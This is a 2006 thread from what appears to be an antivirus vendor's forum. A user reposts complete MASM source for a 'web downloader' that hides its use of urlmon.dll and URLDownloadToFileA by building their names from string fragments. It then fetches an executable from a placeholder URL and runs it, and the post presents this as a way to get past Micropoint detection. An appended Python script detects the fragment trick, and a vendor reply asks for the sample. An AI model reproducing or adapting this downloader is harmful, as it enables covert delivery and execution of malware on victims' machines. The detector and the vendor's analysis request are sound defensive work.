
Title: An approach I saw elsewhere for a virus to get past Micropoint

Author: xiahanxing     Time: 2006-9-6 16:53    Title: An approach I saw elsewhere for a virus to get past Micropoint

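An approach I saw elsewhere for a virus to get past Micropoint
Reposting it here for the Micropoint developers to take a look, hoho

Method for getting past Micropoint (source code)
The precondition for not being flagged by Micropoint is: no network access and no spawning of child processes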

;Tiny Webdownloader by Aphex
;Hides use of URLDownloadToFileA to foil TDS
;http://iamaphex.cjb.net
;unremote@knology.net


.386
.model flat, stdcall
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib

.data
Url byte 'http://your.isp.goes.here/file.exe', 0
Exe byte '~.exe', 0
Scramble1 byte 'dll', 0
Scramble2 byte '.', 0
Scramble3 byte 'mon', 0
Scramble4 byte 'url', 0
Scramble5 byte 'A', 0
Scramble6 byte 'File', 0
Scramble7 byte 'To', 0
Scramble8 byte 'Download', 0
Scramble9 byte 'URL', 0

.data?
UrlMonDll byte 11 dup (?)
UrlDownload byte 19 dup (?)
UrlMon dword ?
UrlDownloadToFile dword ?

.code
_main:
;unscrambles urlmon.dll
invoke lstrcpyn, addr UrlMonDll, addr Scramble4, 4
invoke lstrcat, addr UrlMonDll, addr Scramble3
invoke lstrcat, addr UrlMonDll, addr Scramble2
invoke lstrcat, addr UrlMonDll, addr Scramble1

;unscrambles URLDownloadToFileA
invoke lstrcpyn, addr UrlDownload, addr Scramble9, 4
invoke lstrcat, addr UrlDownload, addr Scramble8
invoke lstrcat, addr UrlDownload, addr Scramble7
invoke lstrcat, addr UrlDownload, addr Scramble6
invoke lstrcat, addr UrlDownload, addr Scramble5

;loads urlmon.dll
invoke LoadLibrary, addr UrlMonDll
mov UrlMon, eax

;links URLDownloadToFileA dynamically
invoke GetProcAddress, UrlMon, addr UrlDownload
mov UrlDownloadToFile, eax

;delete previous version
invoke DeleteFile, addr Exe

;downloads the exe
push 0
push 0
push offset Exe
push offset Url
push 0
call UrlDownloadToFile

;runs the exe
invoke WinExec, addr Exe, 0

;exits
invoke ExitProcess, 0

end _main
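
A static check for the string splitting used in the listing above, added here as an example and not part of the original post or of any Micropoint product: it looks for short adjacent NUL-terminated strings that concatenate, in some order, into a watched DLL or API name. The watchlist, the function names and the sample byte string are assumptions, constructed from the listing's .data section.

```python
from itertools import permutations

# Names to hunt for; assumption for this example, taken from the listing above.
WATCHLIST = ("urlmon.dll", "URLDownloadToFileA")

# Constructed sample: the listing's .data strings laid out as NUL-terminated bytes.
SAMPLE = b"\x00".join([
    b"http://your.isp.goes.here/file.exe", b"~.exe", b"dll", b".", b"mon",
    b"url", b"A", b"File", b"To", b"Download", b"URL", b""])

def fragments(blob, max_len=12):
    """Yield (offset, text) for each short printable ASCII string between NULs."""
    offset = 0
    for chunk in blob.split(b"\x00"):
        if 0 < len(chunk) <= max_len and all(0x20 <= b < 0x7F for b in chunk):
            yield offset, chunk.decode("ascii")
        offset += len(chunk) + 1

def find_split_names(blob, watchlist=WATCHLIST, max_parts=6):
    """Return (name, offset, order) for names stored only as adjacent pieces."""
    frags = list(fragments(blob))
    hits = []
    for name in watchlist:
        if name.encode() in blob:
            continue  # stored whole, so a plain strings/import scan already sees it
        for i in range(len(frags)):
            for k in range(2, min(max_parts, len(frags) - i) + 1):
                parts = [text for _, text in frags[i:i + k]]
                if sum(map(len, parts)) != len(name):
                    continue  # cheap length filter before trying orderings
                order = next((p for p in permutations(parts)
                              if "".join(p) == name), None)
                if order:
                    hits.append((name, frags[i][0], order))
    return hits

if __name__ == "__main__":
    for name, offset, order in find_split_names(SAMPLE):
        print(f"{name}: rebuilt from {order} starting at offset {offset}")
```

Matching is case-sensitive, so the lowercase `url` fragment is not accepted as the start of `URLDownloadToFileA`; only the run ending in `URL` is reported for that name.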
Author: 微点专家     Time: 2006-9-6 18:02
Please send this program of yours to virus@micropoint.com.cn so that Micropoint can analyze it in detail!!!

[ Last edited by 微点专家 on 2006-9-6 at 18:05 ]




Welcome to the Micropoint Exchange Forum (http://bbs.micropoint.com.cn/)